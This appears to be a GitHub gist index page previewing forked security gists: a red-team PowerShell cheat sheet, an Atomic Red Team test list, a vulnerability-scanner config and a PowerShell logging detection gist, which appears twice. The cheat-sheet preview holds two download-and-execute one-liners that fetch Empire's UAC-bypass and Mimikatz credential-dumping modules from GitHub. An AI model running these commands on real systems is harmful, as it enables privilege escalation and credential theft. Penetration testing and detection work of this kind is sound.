sec-js
sec-js
/ RedTeam_CheatSheet.ps1
Created
June 21, 2022 08:21
— forked from jivoi/RedTeam_CheatSheet.ps1
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Description: | |
| # Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing. | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'" | |
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Mimikatz Module to run further commands |
sec-js
/ AtomicTestsCommandLines.txt
Created
June 21, 2022 08:21
— forked from jivoi/AtomicTestsCommandLines.txt
Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| _ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __ | |
| / \|_ _/ _ \| \/ |_ _/ ___| | _ \| ____| _ \ |_ _| ____| / \ | \/ | | |
| / _ \ | || | | | |\/| || | | | |_) | _| | | | | | | | _| / _ \ | |\/| | | |
| / ___ \| || |_| | | | || | |___ | _ <| |___| |_| | | | | |___ / ___ \| | | | | |
| /_/ \_\_| \___/|_| |_|___\____| |_| \_\_____|____/ |_| |_____/_/ \_\_| |_| | |
| [********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s) |
sec-js
/ conf.ini
Created
December 22, 2020 00:14
— forked from MarkVLK/conf.ini
Vulnture configuration file
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [Vulnerability Data Sources] | |
| # https://tools.cisco.com/security/center/Search.x | |
| Cisco=true | |
| # https://nvd.nist.gov/vuln/data-feeds | |
| NVD=true | |
| # Only support one backend for now, more coming... | |
| [Asset Backends] | |
| DynamoDB=true |
sec-js
/ PowerShell Command Line Logging
Created
December 12, 2019 21:48
— forked from gfoss/PowerShell Command Line Logging
Detect and alert on nefarious PowerShell command line activity
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerShell Audit Logging for LogRhythm SIEM - 2015 | |
| # For detecting dangerous PowerShell Commands/Functions | |
| Log Source Type: | |
| MS Event Log for Win7/Win8/2008/2012 - PowerShell | |
| Add this file to your PowerShell directory to enable verbose command line audit logging | |
| profile.ps1 | |
| $LogCommandHealthEvent = $true | |
| $LogCommandLifeCycleEvent = $true |
sec-js
/ PowerShell Command Line Logging
Created
December 12, 2019 21:48
— forked from gfoss/PowerShell Command Line Logging
Detect and alert on nefarious PowerShell command line activity
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # PowerShell Audit Logging for LogRhythm SIEM - 2015 | |
| # For detecting dangerous PowerShell Commands/Functions | |
| Log Source Type: | |
| MS Event Log for Win7/Win8/2008/2012 - PowerShell | |
| Add this file to your PowerShell directory to enable verbose command line audit logging | |
| profile.ps1 | |
| $LogCommandHealthEvent = $true | |
| $LogCommandLifeCycleEvent = $true |